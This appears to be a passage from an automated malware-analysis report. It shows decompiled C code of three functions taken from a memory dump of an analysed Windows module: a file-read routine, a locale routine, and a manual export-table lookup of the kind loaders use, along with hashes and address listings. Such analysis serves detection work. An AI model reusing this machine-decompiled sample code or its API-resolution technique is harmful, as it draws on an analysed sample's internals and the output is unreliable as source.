Instruction ID: 9c716ae7e156ee7335ccf252c8ec6dd83e1d871531587cb8252aeff67bfb221f
Opcode Fuzzy Hash: a44e19a32cf83fa37f1638534ed164baa3c136ad3c26a51a1533c236e92034b3
Instruction Fuzzy Hash: 0121B7BAA00108EFCB41DFD4D884DDE7FB9BF08244F1445AAE5159B220DB31EB56CB80

Uniqueness

Uniqueness Score: -1.00%

Function 6EE49B05, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E6EE49B05(signed int _a4, void* _a8, unsigned int _a12) {
				char _v5;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				long _v32;
				char _v36;
				void* _v40;
				long _v44;
				signed int* _t137;
				signed int _t139;
				intOrPtr _t143;
				unsigned int _t154;
				intOrPtr _t158;
				signed int _t160;
				signed int _t163;
				long _t164;
				intOrPtr _t169;
				signed int _t170;
				intOrPtr _t172;
				signed int _t174;
				signed int _t178;
				void _t180;
				char _t185;
				char _t190;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t207;
				long _t210;
				unsigned int _t212;
				intOrPtr _t214;
				unsigned int _t217;
				intOrPtr _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed char _t224;
				char _t226;
				signed int _t228;
				void* _t229;
				signed int _t230;
				char* _t231;
				char* _t232;
				signed int _t235;
				signed int _t236;
				void* _t240;
				void* _t242;
				void* _t243;

				_t198 = _a4;
				_t246 = _t198 - 0xfffffffe;
				if(_t198 != 0xfffffffe) {
					__eflags = _t198;
					if(__eflags < 0) {
						L59:
						_t137 = E6EE41FFF(__eflags);
						 *_t137 =  *_t137 & 0x00000000;
						__eflags =  *_t137;
						 *((intOrPtr*)(E6EE42012( *_t137))) = 9;
						L60:
						_t139 = E6EE3AC66();
						goto L61;
					}
					__eflags = _t198 -  *0x6ee79568; // 0x40
					if(__eflags >= 0) {
						goto L59;
					}
					_t207 = _t198 >> 6;
					_t235 = (_t198 & 0x0000003f) * 0x38;
					_v12 = _t207;
					_t143 =  *((intOrPtr*)(0x6ee79368 + _t207 * 4));
					_v20 = _t235;
					_v36 = 1;
					_t224 =  *((intOrPtr*)(_t143 + _t235 + 0x28));
					__eflags = 1 & _t224;
					if(__eflags == 0) {
						goto L59;
					}
					_t210 = _a12;
					__eflags = _t210 - 0x7fffffff;
					if(__eflags <= 0) {
						__eflags = _t210;
						if(_t210 == 0) {
							L58:
							return 0;
						}
						__eflags = _t224 & 0x00000002;
						if((_t224 & 0x00000002) != 0) {
							goto L58;
						}
						__eflags = _a8;
						if(__eflags == 0) {
							goto L6;
						}
						_v28 =  *((intOrPtr*)(_t143 + _t235 + 0x18));
						_t226 =  *((intOrPtr*)(_t143 + _t235 + 0x29));
						_v5 = _t226;
						_t240 = 0;
						_t228 = _t226 - 1;
						__eflags = _t228;
						if(_t228 == 0) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags == 0) {
								L14:
								 *(E6EE41FFF(__eflags)) =  *_t149 & _t240;
								 *((intOrPtr*)(E6EE42012(__eflags))) = 0x16;
								E6EE3AC66();
								goto L39;
							} else {
								_t154 = 4;
								_t212 = _t210 >> 1;
								_v16 = _t154;
								__eflags = _t212 - _t154;
								if(_t212 >= _t154) {
									_t154 = _t212;
									_v16 = _t212;
								}
								_t240 = E6EE44756(_t154);
								E6EE4471C(0);
								E6EE4471C(0);
								_t243 = _t242 + 0xc;
								_v24 = _t240;
								__eflags = _t240;
								if(__eflags != 0) {
									_t158 = E6EE4A1ED(_t198, 0, 0, 1);
									_t242 = _t243 + 0x10;
									_t214 =  *((intOrPtr*)(0x6ee79368 + _v12 * 4));
									 *((intOrPtr*)(_t235 + _t214 + 0x20)) = _t158;
									 *(_t235 + _t214 + 0x24) = _t228;
									_t229 = _t240;
									_t210 = _v16;
									_t143 =  *((intOrPtr*)(0x6ee79368 + _v12 * 4));
									L22:
									_t199 = _v20;
									_t235 = 0;
									_v40 = _t229;
									__eflags =  *(_t199 + _t143 + 0x28) & 0x00000048;
									_t200 = _a4;
									if(( *(_t199 + _t143 + 0x28) & 0x00000048) != 0) {
										_t180 =  *((intOrPtr*)(_v20 + _t143 + 0x2a));
										_t200 = _a4;
										__eflags = _t180 - 0xa;
										if(_t180 != 0xa) {
											__eflags = _t210;
											if(_t210 != 0) {
												_t235 = 1;
												 *_t229 = _t180;
												_t231 = _t229 + 1;
												_t220 = _t210 - 1;
												__eflags = _v5;
												_v24 = _t231;
												_v16 = _t220;
												 *((char*)(_v20 +  *((intOrPtr*)(0x6ee79368 + _v12 * 4)) + 0x2a)) = 0xa;
												_t200 = _a4;
												if(_v5 != 0) {
													_t185 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x6ee79368 + _v12 * 4)) + 0x2b));
													_t200 = _a4;
													__eflags = _t185 - 0xa;
													if(_t185 != 0xa) {
														__eflags = _t220;
														if(_t220 != 0) {
															 *_t231 = _t185;
															_t232 = _t231 + 1;
															_t221 = _t220 - 1;
															__eflags = _v5 - 1;
															_v24 = _t232;
															_t235 = 2;
															_v16 = _t221;
															 *((char*)(_v20 +  *((intOrPtr*)(0x6ee79368 + _v12 * 4)) + 0x2b)) = 0xa;
															_t200 = _a4;
															if(_v5 == 1) {
																_t190 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x6ee79368 + _v12 * 4)) + 0x2c));
																_t200 = _a4;
																__eflags = _t190 - 0xa;
																if(_t190 != 0xa) {
																	__eflags = _t221;
																	if(_t221 != 0) {
																		 *_t232 = _t190;
																		_t222 = _t221 - 1;
																		__eflags = _t222;
																		_v16 = _t222;
																		_v24 = _t232 + 1;
																		_t235 = 3;
																		 *((char*)(_v20 +  *((intOrPtr*)(0x6ee79368 + _v12 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t160 = E6EE50AA0(_t200);
									__eflags = _t160;
									if(_t160 == 0) {
										L42:
										_v36 = 0;
										L43:
										_t163 = ReadFile(_v28, _v24, _v16,  &_v32, 0);
										__eflags = _t163;
										if(_t163 == 0) {
											L54:
											_t164 = GetLastError();
											_t235 = 5;
											__eflags = _t164 - _t235;
											if(__eflags != 0) {
												__eflags = _t164 - 0x6d;
												if(_t164 != 0x6d) {
													L38:
													E6EE41FDC(_t164);
													goto L39;
												}
												_t236 = 0;
												goto L40;
											}
											 *((intOrPtr*)(E6EE42012(__eflags))) = 9;
											 *(E6EE41FFF(__eflags)) = _t235;
											goto L39;
										}
										_t217 = _a12;
										__eflags = _v32 - _t217;
										if(_v32 > _t217) {
											goto L54;
										}
										_t236 = _t235 + _v32;
										__eflags = _t236;
										L46:
										_t230 = _v20;
										_t169 =  *((intOrPtr*)(0x6ee79368 + _v12 * 4));
										__eflags =  *((char*)(_t230 + _t169 + 0x28));
										if( *((char*)(_t230 + _t169 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v36;
												_push(_t236 >> 1);
												_push(_v40);
												_push(_t200);
												if(_v36 == 0) {
													_t170 = E6EE49670();
												} else {
													_t170 = E6EE49976();
												}
											} else {
												_t218 = _t217 >> 1;
												__eflags = _t217 >> 1;
												_t170 = E6EE4981F(_t217 >> 1, _t217 >> 1, _t200, _v24, _t236, _a8, _t218);
											}
											_t236 = _t170;
										}
										goto L40;
									}
									_t102 =  &_v20; // 0xa
									_t219 =  *_t102;
									_t172 =  *((intOrPtr*)(0x6ee79368 + _v12 * 4));
									__eflags =  *((char*)(_t219 + _t172 + 0x28));
									if( *((char*)(_t219 + _t172 + 0x28)) >= 0) {
										goto L42;
									}
									_t174 = GetConsoleMode(_v28,  &_v44);
									__eflags = _t174;
									if(_t174 == 0) {
										goto L42;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L43;
									}
									_t178 = ReadConsoleW(_v28, _v24, _v16 >> 1,  &_v32, 0);
									__eflags = _t178;
									if(_t178 != 0) {
										_t217 = _a12;
										_t236 = _t235 + _v32 * 2;
										goto L46;
									}
									_t164 = GetLastError();
									goto L38;
								} else {
									 *((intOrPtr*)(E6EE42012(__eflags))) = 0xc;
									 *(E6EE41FFF(__eflags)) = 8;
									L39:
									_t236 = _t235 | 0xffffffff;
									__eflags = _t236;
									L40:
									E6EE4471C(_t240);
									return _t236;
								}
							}
						}
						__eflags = _t228 == 1;
						if(_t228 == 1) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags != 0) {
								_t229 = _a8;
								_v16 = _t210;
								_v24 = _t229;
								_t143 =  *((intOrPtr*)(0x6ee79368 + _v12 * 4));
								goto L22;
							}
							goto L14;
						} else {
							_t229 = _a8;
							_v16 = _t210;
							_v24 = _t229;
							goto L22;
						}
					}
					L6:
					 *(E6EE41FFF(__eflags)) =  *_t145 & 0x00000000;
					 *((intOrPtr*)(E6EE42012(__eflags))) = 0x16;
					goto L60;
				} else {
					 *(E6EE41FFF(_t246)) =  *_t197 & 0x00000000;
					_t139 = E6EE42012(_t246);
					 *_t139 = 9;
					L61:
					return _t139 | 0xffffffff;
				}
			}

0x6ee49b0e
0x6ee49b12
0x6ee49b15
0x6ee49b2f
0x6ee49b31
0x6ee49e96
0x6ee49e96
0x6ee49e9b
0x6ee49e9b
0x6ee49ea3
0x6ee49ea9
0x6ee49ea9
0x00000000
0x6ee49ea9
0x6ee49b37
0x6ee49b3d
0x00000000
0x00000000
0x6ee49b47
0x6ee49b4d
0x6ee49b50
0x6ee49b53
0x6ee49b5d
0x6ee49b60
0x6ee49b63
0x6ee49b67
0x6ee49b69
0x00000000
0x00000000
0x6ee49b6f
0x6ee49b72
0x6ee49b78
0x6ee49b92
0x6ee49b94
0x6ee49e92
0x00000000
0x6ee49e92
0x6ee49b9a
0x6ee49b9d
0x00000000
0x00000000
0x6ee49ba3
0x6ee49ba7
0x00000000
0x00000000
0x6ee49bad
0x6ee49bb0
0x6ee49bb4
0x6ee49bbb
0x6ee49bbd
0x6ee49bbd
0x6ee49bc0
0x6ee49c15
0x6ee49c17
0x6ee49bdd
0x6ee49be2
0x6ee49be9
0x6ee49bef
0x00000000
0x6ee49c19
0x6ee49c1b
0x6ee49c1c
0x6ee49c1e
0x6ee49c21
0x6ee49c23
0x6ee49c25
0x6ee49c27
0x6ee49c27
0x6ee49c32
0x6ee49c34
0x6ee49c3b
0x6ee49c40
0x6ee49c43
0x6ee49c46
0x6ee49c48
0x6ee49c6c
0x6ee49c74
0x6ee49c77
0x6ee49c7e
0x6ee49c85
0x6ee49c89
0x6ee49c8b
0x6ee49c8e
0x6ee49c95
0x6ee49c95
0x6ee49c98
0x6ee49c9a
0x6ee49c9d
0x6ee49ca2
0x6ee49ca5
0x6ee49cae
0x6ee49cb2
0x6ee49cb5
0x6ee49cb7
0x6ee49cbd
0x6ee49cbf
0x6ee49cc8
0x6ee49cc9
0x6ee49ccb
0x6ee49ccf
0x6ee49cd0
0x6ee49cd4
0x6ee49cd7
0x6ee49ce1
0x6ee49ce6
0x6ee49ce9
0x6ee49cf8
0x6ee49cfc
0x6ee49cff
0x6ee49d01
0x6ee49d03
0x6ee49d05
0x6ee49d0a
0x6ee49d0c
0x6ee49d10
0x6ee49d11
0x6ee49d17
0x6ee49d21
0x6ee49d22
0x6ee49d25
0x6ee49d2a
0x6ee49d2d
0x6ee49d3c
0x6ee49d40
0x6ee49d43
0x6ee49d45
0x6ee49d47
0x6ee49d49
0x6ee49d4b
0x6ee49d51
0x6ee49d51
0x6ee49d52
0x6ee49d61
0x6ee49d64
0x6ee49d65
0x6ee49d65
0x6ee49d49
0x6ee49d45
0x6ee49d2d
0x6ee49d05
0x6ee49d01
0x6ee49ce9
0x6ee49cbf
0x6ee49cb7
0x6ee49d6b
0x6ee49d71
0x6ee49d73
0x6ee49de6
0x6ee49de6
0x6ee49dea
0x6ee49dfa
0x6ee49e00
0x6ee49e02
0x6ee49e5e
0x6ee49e5e
0x6ee49e66
0x6ee49e67
0x6ee49e69
0x6ee49e82
0x6ee49e85
0x6ee49dc2
0x6ee49dc3
0x00000000
0x6ee49dc8
0x6ee49e8b
0x00000000
0x6ee49e8b
0x6ee49e70
0x6ee49e7b
0x00000000
0x6ee49e7b
0x6ee49e04
0x6ee49e07
0x6ee49e0a
0x00000000
0x00000000
0x6ee49e0c
0x6ee49e0c
0x6ee49e0f
0x6ee49e12
0x6ee49e15
0x6ee49e1c
0x6ee49e21
0x6ee49e23
0x6ee49e27
0x6ee49e42
0x6ee49e46
0x6ee49e47
0x6ee49e4a
0x6ee49e4b
0x6ee49e57
0x6ee49e4d
0x6ee49e4d
0x6ee49e4d
0x6ee49e29
0x6ee49e29
0x6ee49e29
0x6ee49e34
0x6ee49e39
0x6ee49e3c
0x6ee49e3c
0x00000000
0x6ee49e21
0x6ee49d78
0x6ee49d78
0x6ee49d7b
0x6ee49d82
0x6ee49d87
0x00000000
0x00000000
0x6ee49d90
0x6ee49d96
0x6ee49d98
0x00000000
0x00000000
0x6ee49d9a
0x6ee49d9e
0x00000000
0x00000000
0x6ee49db2
0x6ee49db8
0x6ee49dba
0x6ee49dde
0x6ee49de1
0x00000000
0x6ee49de1
0x6ee49dbc
0x00000000
0x6ee49c4a
0x6ee49c4f
0x6ee49c5a
0x6ee49dc9
0x6ee49dc9
0x6ee49dc9
0x6ee49dcc
0x6ee49dcd
0x00000000
0x6ee49dd5
0x6ee49c48
0x6ee49c17
0x6ee49bc2
0x6ee49bc5
0x6ee49bd9
0x6ee49bdb
0x6ee49bfc
0x6ee49bff
0x6ee49c02
0x6ee49c05
0x00000000
0x6ee49c05
0x00000000
0x6ee49bc7
0x6ee49bc7
0x6ee49bca
0x6ee49bcd
0x00000000
0x6ee49bcd
0x6ee49bc5
0x6ee49b7a
0x6ee49b7f
0x6ee49b87
0x00000000
0x6ee49b17
0x6ee49b1c
0x6ee49b1f
0x6ee49b24
0x6ee49eae
0x00000000
0x6ee49eae

Strings

, xrefs: 6EE49D78

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: e41051085cbd1704135482954cef91283cc89d71c012adda3914cdbee4e6525f
Instruction ID: ce026dd3f1f437b985ff4d989b20643b8b2d1a34a58bf43d00a5ae8ca759edc2
Opcode Fuzzy Hash: e41051085cbd1704135482954cef91283cc89d71c012adda3914cdbee4e6525f
Instruction Fuzzy Hash: F6C1D170A04247EFDF01CFD9E990BAD7BB8BF4A314F208559E954AB385C7729942CB20

Uniqueness

Uniqueness Score: -1.00%

Function 6EDB2E30, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E6EDB2E30(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr* _v28;
				char _v32;
				unsigned int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				char _v96;
				char _v120;
				char _v144;
				intOrPtr _t125;
				void* _t127;
				signed int _t129;
				signed int _t138;
				intOrPtr _t196;
				void* _t199;

				_t201 = __eflags;
				_push(0xffffffff);
				_push(E6EE56110);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t196;
				_v20 = _a16;
				_v28 = _a12;
				E6EDB18A0( &_v120, __eflags, "name");
				_v8 = 0;
				E6EDB2DB0( &_v120, 0x6ee572c0);
				_v60 =  *((intOrPtr*)(_v20 + 0x24)) -  *_v28 + _v20;
				E6EDB12B0(__eflags,  &_v96,  &_v120, "name2");
				_v8 = 1;
				_v64 =  *((intOrPtr*)(_v20 + 0x1c)) -  *_v28 + _v20;
				E6EDB2BC0(_t201,  &_v144,  &_v120,  &_v96);
				_t199 = _t196 - 0x80 + 0x18;
				_v8 = 2;
				_v52 =  *((intOrPtr*)(_v20 + 0x20)) -  *_v28 + _v20;
				_v40 = 0;
				_v36 =  *((intOrPtr*)(_v20 + 0x18));
				_v24 = _v36 >> 1;
				_v44 = _v36 + 1;
				while(_v44 != _v24) {
					_v56 =  *((intOrPtr*)(_v52 + _v24 * 4)) -  *_v28 + _v20;
					_v32 = 0;
					while(1) {
						_t127 = E6EDB29F0( &_v144);
						_t203 = _v32 - _t127;
						if(_v32 >= _t127) {
							break;
						}
						E6EDB2B80(_t203, 0x6ee572cc,  *((char*)(E6EDB2D90( &_v144, _v32))));
						_t199 = _t199 + 8;
						_v32 = _v32 + 1;
					}
					_t129 = E6EE3E510(_a4, _v56);
					_t199 = _t199 + 8;
					_v48 = _t129;
					__eflags = _v48;
					if(_v48 <= 0) {
						__eflags = _v48;
						if(_v48 >= 0) {
							_v68 = _a8 +  *((intOrPtr*)(_v64 + ( *(_v60 + _v24 * 2) & 0x0000ffff) * 4));
							_v8 = 1;
							E6EDB1D80( &_v144);
							_v8 = 0;
							E6EDB1D80( &_v96);
							_v8 = 0xffffffff;
							E6EDB1D80( &_v120);
							_t125 = _v68;
						} else {
							_v36 = _v24;
							goto L12;
						}
					} else {
						_v40 = _v24;
						L12:
						_v44 = _v24;
						_t138 = (_v36 - _v40 >> 1) + _v40;
						__eflags = _t138;
						_v24 = _t138;
						continue;
					}
					L14:
					 *[fs:0x0] = _v16;
					return _t125;
				}
				E6EDB30F0( &_v96);
				_push(E6EDB2660( &_v96));
				E6EDB1340(_t120);
				_v72 = 0;
				_v8 = 1;
				E6EDB1D80( &_v144);
				_v8 = 0;
				E6EDB1D80( &_v96);
				_v8 = 0xffffffff;
				E6EDB1D80( &_v120);
				_t125 = _v72;
				goto L14;
			}

0x6edb2e30
0x6edb2e33
0x6edb2e35
0x6edb2e40
0x6edb2e41
0x6edb2e52
0x6edb2e58
0x6edb2e63
0x6edb2e68
0x6edb2e77
0x6edb2e93
0x6edb2ea3
0x6edb2eab
0x6edb2ec6
0x6edb2ed8
0x6edb2edd
0x6edb2ee0
0x6edb2efb
0x6edb2efe
0x6edb2f0b
0x6edb2f13
0x6edb2f1c
0x6edb2f35
0x6edb2f5b
0x6edb2f5e
0x6edb2f70
0x6edb2f76
0x6edb2f7b
0x6edb2f7e
0x00000000
0x00000000
0x6edb2f98
0x6edb2f9d
0x6edb2f6d
0x6edb2f6d
0x6edb2faa
0x6edb2faf
0x6edb2fb2
0x6edb2fb5
0x6edb2fb9
0x6edb2fc3
0x6edb2fc7
0x6edb2fe4
0x6edb2fe7
0x6edb2ff1
0x6edb2ff6
0x6edb2ffd
0x6edb3002
0x6edb300c
0x6edb3011
0x6edb2fc9
0x6edb2fcc
0x00000000
0x6edb2fcc
0x6edb2fbb
0x6edb2fbe
0x6edb3016
0x6edb2f24
0x6edb2f2f
0x6edb2f2f
0x6edb2f32
0x00000000
0x6edb2f32
0x6edb3068
0x6edb306b
0x6edb3076
0x6edb3076
0x6edb301e
0x6edb302b
0x6edb302c
0x6edb3034
0x6edb303b
0x6edb3045
0x6edb304a
0x6edb3051
0x6edb3056
0x6edb3060
0x6edb3065
0x00000000

APIs

task.LIBCPMTD ref: 6EDB2FF1
task.LIBCPMTD ref: 6EDB2FFD
task.LIBCPMTD ref: 6EDB300C
task.LIBCPMTD ref: 6EDB3045
task.LIBCPMTD ref: 6EDB3051
task.LIBCPMTD ref: 6EDB3060

Strings

name2, xrefs: 6EDB2E96
name, xrefs: 6EDB2E5B

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: task
String ID: name$name2
API String ID: 1384045349-1546360577
Opcode ID: 5b38dd79b04aff37025f1122e043fb9075649c3f7f91831569a391cdaaf97ea5
Instruction ID: a54adf20c3046a28b597c3117be9860efd90d88fa46769766d7c39b412d35921
Opcode Fuzzy Hash: 5b38dd79b04aff37025f1122e043fb9075649c3f7f91831569a391cdaaf97ea5
Instruction Fuzzy Hash: 8C71E7B5D00219DFCB04CFD8C990AEEBBB5BF49308F248569E45267384EB346A05CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6EE474CB, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E6EE474CB(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				short _v706;
				signed int _v708;
				signed int _v712;
				signed int _v716;
				intOrPtr _v720;
				signed int _v724;
				intOrPtr _v728;
				signed int* _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				intOrPtr _v772;
				signed int _v784;
				void* __ebp;
				signed int _t156;
				void* _t163;
				signed int _t166;
				signed int _t167;
				intOrPtr _t168;
				signed int _t171;
				signed int _t173;
				signed int _t174;
				signed int _t177;
				signed int _t178;
				signed int _t181;
				signed int _t182;
				signed int _t184;
				signed int _t202;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t213;
				intOrPtr* _t221;
				intOrPtr* _t222;
				char* _t229;
				intOrPtr _t233;
				intOrPtr* _t234;
				signed int _t236;
				signed int _t241;
				signed int _t242;
				void* _t247;
				signed int _t248;
				intOrPtr _t250;
				signed int _t256;
				signed int _t258;
				signed int _t261;
				signed int* _t262;
				short _t263;
				signed int _t265;
				signed int _t269;
				void* _t271;
				void* _t273;

				_t285 = __fp0;
				_t265 = _t269;
				_t156 =  *0x6ee77a68; // 0xbfafeb97
				_v8 = _t156 ^ _t265;
				_push(__ebx);
				_t213 = _a8;
				_push(__esi);
				_push(__edi);
				_t250 = _a4;
				_v736 = _t213;
				_v732 = E6EE444CA(__ecx, __edx, __fp0) + 0x278;
				_t163 = E6EE46BB6(_t213, __edx, _t250, _a12, __fp0, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v716);
				_t271 = _t269 - 0x2e4 + 0x18;
				if(_t163 == 0) {
					L40:
					__eflags = 0;
					goto L41;
				} else {
					_t10 = _t213 + 2; // 0x6
					_t256 = _t10 << 4;
					_t166 =  &_v272;
					_v712 = _t256;
					_t221 =  *((intOrPtr*)(_t256 + _t250));
					while(1) {
						_v704 = _v704 & 0x00000000;
						_t258 = _v712;
						if( *_t166 !=  *_t221) {
							break;
						}
						if( *_t166 == 0) {
							L7:
							_t167 = _v704;
						} else {
							_t263 =  *((intOrPtr*)(_t166 + 2));
							_v706 = _t263;
							_t258 = _v712;
							if(_t263 !=  *((intOrPtr*)(_t221 + 2))) {
								break;
							} else {
								_t166 = _t166 + 4;
								_t221 = _t221 + 4;
								if(_v706 != 0) {
									continue;
								} else {
									goto L7;
								}
							}
						}
						L9:
						if(_t167 != 0) {
							_t222 =  &_v272;
							_t247 = _t222 + 2;
							do {
								_t168 =  *_t222;
								_t222 = _t222 + 2;
								__eflags = _t168 - _v704;
							} while (_t168 != _v704);
							_v708 = (_t222 - _t247 >> 1) + 1;
							_t171 = E6EE44756(4 + ((_t222 - _t247 >> 1) + 1) * 2);
							_v724 = _t171;
							__eflags = _t171;
							if(_t171 == 0) {
								goto L40;
							} else {
								_v720 =  *((intOrPtr*)(_t258 + _t250));
								_v740 =  *(_t250 + 0xa0 + _t213 * 4);
								_v744 =  *(_t250 + 8);
								_t229 =  &_v272;
								_v728 = _t171 + 4;
								_t173 = E6EE485D1(_t171 + 4, _v708, _t229);
								_t273 = _t271 + 0xc;
								__eflags = _t173;
								if(_t173 != 0) {
									_t174 = _v704;
									_push(_t174);
									_push(_t174);
									_push(_t174);
									_push(_t174);
									_push(_t174);
									E6EE3AC93();
									asm("int3");
									_push(_t265);
									_push(_t229);
									_v784 = _v784 & 0x00000000;
									_t177 = E6EE44DE4(_v772, 0x20001004,  &_v784, 2);
									__eflags = _t177;
									if(_t177 == 0) {
										L50:
										_t178 = 0xfde9;
									} else {
										_t178 = _v12;
										__eflags = _t178;
										if(_t178 == 0) {
											goto L50;
										}
									}
									return _t178;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t258 + _t250)) = _v728;
									if(_v272 != 0x43) {
										L18:
										_t181 = E6EE46935(_t213, _t250,  &_v700);
										_t248 = _v704;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L18;
										} else {
											_t248 = _v704;
											_t181 = _t248;
										}
									}
									 *(_t250 + 0xa0 + _t213 * 4) = _t181;
									__eflags = _t213 - 2;
									if(_t213 != 2) {
										__eflags = _t213 - 1;
										if(_t213 != 1) {
											__eflags = _t213 - 5;
											if(_t213 == 5) {
												 *((intOrPtr*)(_t250 + 0x14)) = _v716;
											}
										} else {
											 *((intOrPtr*)(_t250 + 0x10)) = _v716;
										}
									} else {
										_t262 = _v732;
										 *(_t250 + 8) = _v716;
										_v708 = _t262[8];
										_t241 = _t262[9];
										_v716 = _t241;
										while(1) {
											__eflags =  *(_t250 + 8) -  *(_t262 + _t248 * 8);
											if( *(_t250 + 8) ==  *(_t262 + _t248 * 8)) {
												break;
											}
											_t210 =  *(_t262 + _t248 * 8);
											_t241 =  *(_t262 + 4 + _t248 * 8);
											 *(_t262 + _t248 * 8) = _v708;
											 *(_t262 + 4 + _t248 * 8) = _v716;
											_t248 = _t248 + 1;
											_t213 = _v736;
											_v708 = _t210;
											_v716 = _t241;
											__eflags = _t248 - 5;
											if(_t248 < 5) {
												continue;
											} else {
											}
											L26:
											__eflags = _t248 - 5;
											if(__eflags == 0) {
												_t202 = E6EE4C37D(_t213, _t248, _t250, _t262, __eflags, _t285, _v704, 1, 0x6ee5f7d0, 0x7f,  &_v528,  *(_t250 + 8), 1);
												_t273 = _t273 + 0x1c;
												__eflags = _t202;
												if(_t202 == 0) {
													_t242 = _v704;
												} else {
													_t204 = _v704;
													do {
														 *(_t265 + _t204 * 2 - 0x20c) =  *(_t265 + _t204 * 2 - 0x20c) & 0x000001ff;
														_t204 = _t204 + 1;
														__eflags = _t204 - 0x7f;
													} while (_t204 < 0x7f);
													_t206 = E6EE37FB0( &_v528,  *0x6ee77c20, 0xfe);
													_t273 = _t273 + 0xc;
													__eflags = _t206;
													_t242 = 0 | _t206 == 0x00000000;
												}
												_t262[1] = _t242;
												 *_t262 =  *(_t250 + 8);
											}
											 *(_t250 + 0x18) = _t262[1];
											goto L38;
										}
										__eflags = _t248;
										if(_t248 != 0) {
											 *_t262 =  *(_t262 + _t248 * 8);
											_t262[1] =  *(_t262 + 4 + _t248 * 8);
											 *(_t262 + _t248 * 8) = _v708;
											 *(_t262 + 4 + _t248 * 8) = _t241;
										}
										goto L26;
									}
									L38:
									_t182 = _t213 * 0xc;
									_t111 = _t182 + 0x6ee5f858; // 0x6ee35745
									 *0x6ee5714c(_t250);
									_t184 =  *((intOrPtr*)( *_t111))();
									_t233 = _v720;
									__eflags = _t184;
									if(_t184 == 0) {
										__eflags = _t233 - 0x6ee77ce8;
										if(_t233 != 0x6ee77ce8) {
											_t261 = _t213 + _t213;
											__eflags = _t261;
											asm("lock xadd [eax], ecx");
											if(_t261 != 0) {
												goto L45;
											} else {
												E6EE4471C( *((intOrPtr*)(_t250 + 0x28 + _t261 * 8)));
												E6EE4471C( *((intOrPtr*)(_t250 + 0x24 + _t261 * 8)));
												E6EE4471C( *(_t250 + 0xa0 + _t213 * 4));
												_t236 = _v704;
												 *(_v712 + _t250) = _t236;
												 *(_t250 + 0xa0 + _t213 * 4) = _t236;
											}
										}
										_t234 = _v724;
										 *_t234 = 1;
										 *((intOrPtr*)(_t250 + 0x28 + (_t213 + _t213) * 8)) = _t234;
									} else {
										 *((intOrPtr*)(_v712 + _t250)) = _t233;
										E6EE4471C( *(_t250 + 0xa0 + _t213 * 4));
										 *(_t250 + 0xa0 + _t213 * 4) = _v740;
										E6EE4471C(_v724);
										 *(_t250 + 8) = _v744;
										goto L40;
									}
									goto L41;
								}
							}
						} else {
							L41:
							return E6EE361A7(_v8 ^ _t265);
						}
						goto L52;
					}
					asm("sbb eax, eax");
					_t167 = _t166 | 0x00000001;
					__eflags = _t167;
					goto L9;
				}
				L52:
			}

0x6ee474cb
0x6ee474ce
0x6ee474d6
0x6ee474dd
0x6ee474e0
0x6ee474e1
0x6ee474e4
0x6ee474e8
0x6ee474e9
0x6ee474ec
0x6ee474fc
0x6ee4751f
0x6ee47524
0x6ee47529
0x6ee477df
0x6ee477df
0x00000000
0x6ee4752f
0x6ee4752f
0x6ee47532
0x6ee47535
0x6ee4753b
0x6ee47544
0x6ee47546
0x6ee47549
0x6ee47553
0x6ee47559
0x00000000
0x00000000
0x6ee4755f
0x6ee47588
0x6ee47588
0x6ee47561
0x6ee47561
0x6ee47569
0x6ee47570
0x6ee47576
0x00000000
